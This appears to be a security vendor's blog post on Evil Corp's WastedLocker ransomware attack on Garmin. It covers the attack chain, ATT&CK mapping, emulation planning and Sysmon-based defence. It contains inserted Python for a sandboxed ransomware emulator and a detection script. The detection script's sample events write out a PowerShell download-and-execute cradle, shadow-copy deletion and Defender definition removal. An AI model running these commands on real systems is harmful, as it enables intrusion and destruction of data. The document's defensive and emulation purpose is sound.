#ThreatThursday - Evil Corp


Garmin users noticed their devices were not working on July 22, 2020; upon visiting the Garmin website, they were shown the image below. It would not be until a week later that most Garmin services were operational again. As more information was made public, we learned the attack was attributed to a threat group known as Evil Corp and that they leveraged a fairly new ransomware called WastedLocker. This blog post dives deeper into the Garmin attack: we extract TTPs from Cyber Threat Intelligence, create a MITRE ATT&CK Navigator Layer and adversary emulation plan, emulate the attack with Cobalt Strike (as Evil Corp used) and then drop a synthetic WastedLocker built with SCYTHE, and discuss how to defend against ransomware attacks with Olaf Hartong. This blog post is a summary of the DEF CON Red Team Village talk; the slides are available here and the video of the presentation is below.


Cyber Threat Intelligence

News of the Garmin attack started coming in on July 22, 2020. Eventually we learned all Garmin services were down for about a week:



We found, through Cyber Threat Intelligence, that the group responsible for the attack is Evil Corp and that they used a ransomware called WastedLocker. This group is not documented on the MITRE ATT&CK site, so we had to review the Cyber Threat Intelligence below, extract the TTPs, and map them to MITRE ATT&CK:

Evil Corp, as a threat group, is more sophisticated than the standard ransomware attack in that they manually interact with the target, move laterally through a number of systems, and then drop the ransomware. In this case, they dropped WastedLocker. At a high level, this is how the attack works:

  • SocGholish is delivered to the victim in a zipped file via compromised legitimate websites
  • The zip file contains malicious JavaScript masquerading as a browser update
  • A second JavaScript file profiles the computer and uses PowerShell to download additional discovery-related PowerShell scripts
  • Once the attackers gain network access, they use Cobalt Strike commodity malware with living-off-the-land tools to steal credentials, escalate privileges, and move across the network to deploy WastedLocker on multiple computers
  • PowerShell is used to download and execute a loader from a domain publicly reported as being used to deliver Cobalt Strike as part of WastedLocker attacks
  • An injected payload, known as Cobalt Strike Beacon, is used to execute commands, inject into other processes, elevate current processes or impersonate other processes, and upload and download files
  • Privilege escalation is performed using a publicly documented technique involving the Software Licensing User Interface tool, a command line utility responsible for activating and updating the Windows operating system
  • The attackers use the Windows Management Instrumentation Command Line Utility to execute commands on remote computers, such as adding a new user or executing additional downloaded PowerShell scripts
  • The attackers launch a legitimate command line tool for managing Windows Defender to disable scanning of all downloaded files and attachments, remove all installed definitions, and, in some cases, disable real-time monitoring
  • The Windows Sysinternals tool PsExec is used to launch the WastedLocker ransomware, which then begins encrypting data and deleting shadow volumes

Here is a screenshot of what the end user would see:

https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/

While the Cyber Threat Intelligence by NCC Group and Symantec has good detail, it is not mapped to MITRE ATT&CK, so we did the mapping using ATT&CK Navigator and shared the JSON in the SCYTHE Community Threats GitHub. Here is a direct link to the Navigator Layer shown below:

Figure 1: Evil Corp with WastedLocker ATT&CK Navigator Layer

Adversary Emulation Plan

Is emulating ransomware even possible? Of course it is! The secret is to not encrypt or destroy production data. Instead, create new files first and then emulate the typical ransomware steps of encrypting, exfiltrating, and dropping a ransom note against those files only. This method ensures no real data is ever at risk of being encrypted, destroyed, or leaked.
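The create-then-encrypt method above, as an added example that is not SCYTHE's synthetic WastedLocker or any code from the post: it seeds its own files in a scratch directory, refuses to touch anything outside it, performs the encrypt/rename/note behaviors the threat profile lists under Impact, and proves the result is reversible so the range can be cleaned up. The note name, the extension and the placeholder cipher are assumptions for this example only.

```python
import hashlib
import os
import tempfile
from pathlib import Path

NOTE_NAME = "HOW_TO_RECOVER.txt"  # constructed note name, not WastedLocker's
EXT = ".emulated"                 # constructed extension, not WastedLocker's

def keystream_xor(data: bytes, key: bytes) -> bytes:
    """Reversible XOR with a SHA-256 counter keystream; emulation-grade, not real crypto."""
    out = bytearray()
    for off in range(0, len(data), 32):
        ks = hashlib.sha256(key + off.to_bytes(8, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[off:off + 32], ks))
    return bytes(out)

def seed_sandbox(root: Path, count: int = 5) -> list[Path]:
    """Create the synthetic victim files; nothing else is ever put at risk."""
    root.mkdir(parents=True, exist_ok=True)
    files = []
    for i in range(count):
        p = root / f"report_{i}.docx"
        p.write_bytes(os.urandom(256))
        files.append(p)
    return files

def emulate(root: Path, files: list[Path], key: bytes) -> list[Path]:
    """Encrypt in place, rename, drop a note: the Impact behaviors (T1486,
    T1565.001) from the threat profile, limited to the seeded files."""
    encrypted = []
    for p in files:
        if root.resolve() not in p.resolve().parents:  # guardrail: stay in the sandbox
            raise RuntimeError(f"refusing to touch {p}")
        p.write_bytes(keystream_xor(p.read_bytes(), key))
        target = p.with_name(p.name + EXT)
        p.rename(target)
        encrypted.append(target)
    (root / NOTE_NAME).write_text("EMULATION ONLY - no real data was encrypted\n")
    return encrypted

def run_emulation() -> dict:
    """Seed, emulate, then prove reversibility so the range can be cleaned up."""
    root = Path(tempfile.mkdtemp(prefix="ransom_emul_"))
    key = os.urandom(32)
    originals = seed_sandbox(root)
    plaintext = {p.name: p.read_bytes() for p in originals}
    encrypted = emulate(root, originals, key)
    recovered = {p.name[:-len(EXT)]: keystream_xor(p.read_bytes(), key) for p in encrypted}
    return {"root": root, "encrypted": encrypted, "note": (root / NOTE_NAME).exists(),
            "reversible": recovered == plaintext}
```

Point file-integrity monitoring or Sysmon file-event rules at the scratch directory while this runs to confirm the rename and note-drop behaviors are seen.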

First, we build a threat profile for Evil Corp and WastedLocker:

Tactic               | Description
---------------------|-------------------------------------------------
Initial Access       | T1189 - Drive-by Compromise
Command and Control  | T1071 - Application Layer Protocol
                     | T1071.001 - Web Protocols
                     | T1573 - Encrypted Channel
                     | T1573.002 - Asymmetric Cryptography
Execution            | T1059 - Command and Scripting Interpreter
                     | T1059.001 - PowerShell
                     | T1059.007 - JavaScript/JScript
                     | T1569 - System Services
                     | T1569.002 - Service Execution
                     | T1204 - User Execution
                     | T1204.002 - Malicious File
                     | T1047 - Windows Management Instrumentation
Defense Evasion      | T1564 - Hide Artifacts
                     | T1564.004 - NTFS File Attributes
                     | T1562 - Impair Defenses
                     | T1562.001 - Disable or Modify Tools
Discovery            | T1087 - Account Discovery
                     | T1087.001 - Local Account
                     | T1087.002 - Domain Account
                     | T1033 - System Owner/User Discovery
Privilege Escalation | T1548 - Abuse Elevation Control Mechanism
                     | T1548.002 - Bypass User Access Control
Lateral Movement     | T1570 - Lateral Tool Transfer
                     | T1021.002 - SMB/Windows Admin Shares
Impact               | T1485 - Data Destruction
                     | T1486 - Data Encrypted for Impact
                     | T1565 - Data Manipulation
                     | T1565.001 - Stored Data Manipulation
                     | T1490 - Inhibit System Recovery
                     | T1489 - Service Stop


Given Evil Corp used Cobalt Strike for manual lateral movement, we demo how to get a Cobalt Strike Beacon using PowerShell, just as Evil Corp did. Then we use Cobalt Strike to drop the WastedLocker ransomware we created with SCYTHE. The synthetic malware is available on our Community Threats GitHub for Evil Corp and was created with the below steps:

Defend against WastedLocker

We had the pleasure of sitting down with industry thought leader and newly awarded Microsoft MVP Olaf Hartong to discuss how to defend against ransomware attacks. Given there are many strains of ransomware in the wild, it is important to focus on the behaviors ransomware has shown in the past and to continue monitoring as these criminal gangs evolve.

Olaf gives us an introduction to Sysmon, a Windows system service and device driver that monitors and logs system activity to the Windows event log. It provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.
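One way to turn Sysmon process-creation events into a detection for the behaviors in the threat profile, as an added example that is not from the post, Olaf Hartong or SCYTHE: it matches constructed Event ID 1 records against the technique IDs from the profile and alerts only when one host shows several of them, since any single match is noisy on its own. Field names follow Sysmon's ProcessCreate schema; the sample events, hostnames and URL are constructed, and the rule patterns are assumptions, not a vetted ruleset.

```python
import re
from collections import defaultdict

# (ATT&CK ID from the post's threat profile, image regex, command-line regex)
RULES = [
    ("T1059.001", r"powershell\.exe$", r"(?i)downloadstring|iex\b|invoke-expression"),
    ("T1047",     r"wmic\.exe$",       r"(?i)/node:"),
    ("T1562.001", r"mpcmdrun\.exe$",   r"(?i)-removedefinitions"),
    ("T1562.001", r"powershell\.exe$", r"(?i)set-mppreference.*-disable"),
    ("T1490",     r"vssadmin\.exe$",   r"(?i)delete\s+shadows"),
    ("T1569.002", r"psexe(c|svc)\.exe$", r"."),
]

def match_event(evt: dict) -> list[str]:
    """Return the ATT&CK IDs whose image and command-line patterns both match."""
    return [tid for tid, img_re, cmd_re in RULES
            if re.search(img_re, evt["Image"], re.I) and re.search(cmd_re, evt["CommandLine"])]

def find_chains(events: list[dict], min_techniques: int = 3) -> dict[str, set[str]]:
    """Group hits per host: several distinct post-compromise techniques on one
    machine is much stronger evidence than any single, often noisy, match."""
    per_host = defaultdict(set)
    for evt in events:
        per_host[evt["Computer"]].update(match_event(evt))
    return {host: tids for host, tids in per_host.items() if len(tids) >= min_techniques}

# Constructed sample telemetry; hostnames, paths and the URL are placeholders
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": PS,
     "CommandLine": "powershell -nop -w hidden IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"Computer": "WS01", "Image": r"C:\Windows\System32\wbem\wmic.exe",
     "CommandLine": r'wmic /node:FS01 process call create "powershell -File C:\tmp\discover.ps1"'},
    {"Computer": "FS01", "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": "MpCmdRun.exe -RemoveDefinitions -All"},
    {"Computer": "FS01", "Image": r"C:\Windows\PSEXESVC.exe", "CommandLine": r"C:\Windows\PSEXESVC.exe"},
    {"Computer": "FS01", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"Computer": "WS02", "Image": PS, "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},  # benign
]

if __name__ == "__main__":
    for host, tids in find_chains(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: WastedLocker-like chain {sorted(tids)}")
```

In the sample, only FS01 crosses the three-technique threshold; WS01's two hits surface once the threshold is lowered, which is the tuning knob to balance against false positives from administrative PowerShell and WMI use.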

Conclusion

Ransomware is evolving and getting more sophisticated. Evil Corp uses a number of tools to gain initial access, manually move laterally around the target environment, and then drop the ransomware. In this post, we consumed the Cyber Threat Intelligence as it came out, extracted TTPs, mapped them to MITRE ATT&CK and created a Navigator Layer, created an adversary emulation plan and shared it on our GitHub, demoed the emulation, and discussed defending against ransomware with Olaf Hartong. We hope you enjoyed this blog post, which is a summary of the DEF CON Red Team Village talk; the slides are available here.

This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.

About SCYTHE

SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, visit https://scythe.io, or follow on Twitter @scythe_io
